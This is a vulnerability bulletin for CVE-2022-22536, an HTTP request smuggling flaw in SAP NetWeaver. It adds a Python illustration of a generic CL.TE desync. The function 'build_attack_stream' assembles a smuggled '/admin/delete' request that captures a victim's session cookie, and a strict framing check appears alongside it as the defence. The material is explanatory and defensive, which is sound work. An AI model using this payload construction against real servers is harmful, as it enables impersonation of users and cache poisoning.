SB2022021025 - HTTP request smuggling in SAP NetWeaver

Published: February 10, 2022 Updated: April 4, 2025

Security Bulletin ID SB2022021025
CSH Severity
Critical
Patch available
YES
Number of vulnerabilities 1
Exploitation vector Remote access
Highest impact Code execution

Breakdown by Severity

Critical 100%

Description

This security bulletin contains information about 1 vulnerability.


1) Inconsistent interpretation of HTTP requests (CVE-ID: CVE-2022-22536)

CWE-ID: CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A/U:Red


The vulnerability allows a remote, unauthenticated attacker to perform HTTP request smuggling attacks.

The vulnerability exists because the affected component validates HTTP requests inconsistently, so it can disagree with an upstream proxy, load balancer or cache about where one request ends and the next one begins. A remote attacker who can reach the HTTP service can prepend arbitrary data to the next request that arrives on the same connection (a victim's request), and so execute application functions while impersonating that victim or poison intermediary Web caches with attacker-chosen responses.

Successful exploitation of the vulnerability can result in full system compromise.
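The mechanism described above, as an added illustration of the general CWE-444 pattern. This is example code written for this bulletin, not SAP code and not a reproduction of the SAP NetWeaver defect: it models two HTTP/1.1 parsers that frame a request body differently (a classic CL.TE desync), shows the attacker's bytes landing in front of the victim's request, and includes the strict framing check a front end can apply. The hostname, paths, cookie value and the traffic itself are constructed for the example.

```python
"""Generic CL.TE request-smuggling desync, as an added illustration of CWE-444.

Example code for this bulletin, not SAP code and not the SAP NetWeaver defect;
it only models two HTTP/1.1 parsers that disagree on where a body ends.
"""
import re
from typing import Dict, List, Optional, Tuple

CRLF = b"\r\n"
Headers = Dict[bytes, List[bytes]]
Request = Tuple[bytes, Headers]


def split_head(buf: bytes) -> Optional[Tuple[bytes, Headers, bytes]]:
    """Split off one request head -> (request-line, headers, bytes after head)."""
    idx = buf.find(CRLF + CRLF)
    if idx < 0:
        return None
    lines = buf[:idx].split(CRLF)
    headers: Headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, buf[idx + 4:]


def skip_chunked(rest: bytes) -> bytes:
    """Consume a chunked body and return the bytes after its terminating chunk."""
    while True:
        eol = rest.find(CRLF)
        size = int(rest[:eol].split(b";")[0], 16)
        rest = rest[eol + 2:]
        if size == 0:                      # last-chunk, followed by an empty trailer line
            return rest[rest.find(CRLF) + 2:]
        rest = rest[size + 2:]             # chunk data plus its CRLF


def parse_stream(buf: bytes, honour_te: bool) -> List[Request]:
    """Frame every request in buf. honour_te=False mimics a hop that frames by
    Content-Length only; honour_te=True mimics one that prefers chunked."""
    out: List[Request] = []
    while (parsed := split_head(buf)) is not None:
        req_line, headers, rest = parsed
        te = headers.get(b"transfer-encoding", [])
        if honour_te and te and te[-1].lower() == b"chunked":
            buf = skip_chunked(rest)
        else:
            buf = rest[int(headers.get(b"content-length", [b"0"])[0]):]
        out.append((req_line, headers))
    return out


def ambiguous_framing(headers: Headers) -> Optional[str]:
    """Strict check a front end can apply before forwarding: reject any request
    whose body length could be read two ways (the hardened counterpart)."""
    cl = headers.get(b"content-length", [])
    te = headers.get(b"transfer-encoding", [])
    if cl and te:
        return "Content-Length and Transfer-Encoding both present"
    if len(set(cl)) > 1:
        return "conflicting Content-Length values"
    if any(not re.fullmatch(rb"[0-9]+", v) for v in cl):
        return "malformed Content-Length"
    if te and te[-1].lower() != b"chunked":
        return "unrecognised Transfer-Encoding"
    return None


def build_attack_stream() -> bytes:
    """Constructed sample traffic: an attacker request followed on the same
    connection by a victim's request. Host, paths and cookie are invented."""
    smuggled = b"GET /admin/delete?user=victim HTTP/1.1" + CRLF + b"X-Ignored: "
    body = b"0" + CRLF + CRLF + smuggled          # chunked view: body is empty
    attacker = (b"POST /upload HTTP/1.1" + CRLF
                + b"Host: app.example" + CRLF
                + b"Content-Length: " + str(len(body)).encode() + CRLF
                + b"Transfer-Encoding: chunked" + CRLF + CRLF + body)
    victim = (b"GET /account HTTP/1.1" + CRLF
              + b"Host: app.example" + CRLF
              + b"Cookie: session=victim-cookie" + CRLF + CRLF)
    return attacker + victim


def demo() -> dict:
    """Show both framings of the same bytes plus the strict check's verdict."""
    stream = build_attack_stream()
    front = parse_stream(stream, honour_te=False)
    back = parse_stream(stream, honour_te=True)
    first_headers = split_head(stream)[1]
    return {
        "front_end": [r[0] for r in front],
        "back_end": [r[0] for r in back],
        "hijacked_cookie": back[1][1].get(b"cookie", [None])[0],
        "strict_verdict": ambiguous_framing(first_headers),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The front-end view sees two benign requests (POST /upload, then the victim's GET /account); the back-end view sees the attacker's smuggled GET /admin/delete request with the victim's Cookie header attached, which is the impersonation the bulletin describes. The `ambiguous_framing` check is a defence-in-depth control for proxies and load balancers in front of the application; it does not replace the vendor patch, since the defect here is in how the application itself interprets requests.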


Remediation

Install the update from the vendor's website.